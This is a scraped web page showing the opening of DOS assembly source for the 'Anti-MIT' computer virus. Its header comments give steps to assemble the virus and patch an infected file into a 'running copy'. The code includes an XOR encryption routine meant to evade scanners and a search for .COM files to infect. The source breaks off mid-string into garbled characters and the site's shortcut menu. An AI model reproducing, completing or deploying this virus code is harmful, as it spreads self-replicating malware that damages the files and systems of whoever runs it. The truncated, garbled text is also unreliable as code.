?? mit.asm
字號:
; ** Anti-MIT Virus **
; To assemble, use TASM and TLINK to create a .COM file. Next
; run the .COM file in the same directory of a file you want to infect.
; Your system may hang, but after re-booting you will notice an increase
; in the target files size. Now debug the newly infected file and replace
; the first three bytes with E8 05 00 (call to encryption). Re-write the
; .COM file and now you should have a running copy of the Anti-Mit virus!
;
; - Do not distribute the Anti-MIT virus for this
; activity is against the law! The author will take
; NO responsiblity for others.
; TEST ONLY
;
; For more info see MIT.DOX file.
name AntiMIT
title Anti-MIT: The original Anti-MIT virus code!
.radix 16
code segment
assume cs:code,ds:code
org 100
buffer equ offset 20000d ; Buffer
fname equ offset 20000d + 1eh ; DTA - File name
ftime equ offset 20000d + 16h ; DTA - File time
fsize equ offset 20000d + 1ah ; DTA - File size
olddta equ 80 ; Old DTA area
start:
jmp main ; *See above*
nop
jmp main ; Jmp to virus body
encrypt_val db 0 ; Randomized encryption value
decrypt: ; Encrypt/decrypt engine
encrypt: ; [SKISM type]
lea si, data
mov ah, encrypt_val
jmp fool_em ; Fool with the scanners
xor_loop:
lodsb ; ds:[si] -> al
xor al, ah
stosb ; al -> es:[di]
loop xor_loop
mov ah,19h ; Set current drive as default
int 21h
mov dh,al
mov ah,0eh
int 21h
ret
fool_em:
mov di, si
mov cx, stop_encrypt - data
jmp xor_loop
data label byte ; Virus data
message db 'MIT Sux! $' ; The "message"
lengthp dw ? ; Length of infected file
allcom db '*.COM',0 ; What to search for
virus db '[Anti-MIT]',0 ; Virus name
author db 'F宺s豐tr宬?? 快捷鍵說明
復制代碼
Ctrl + C
搜索代碼
Ctrl + F
全屏模式
F11
切換主題
Ctrl + Shift + D
顯示快捷鍵
?
增大字號
Ctrl + =
減小字號
Ctrl + -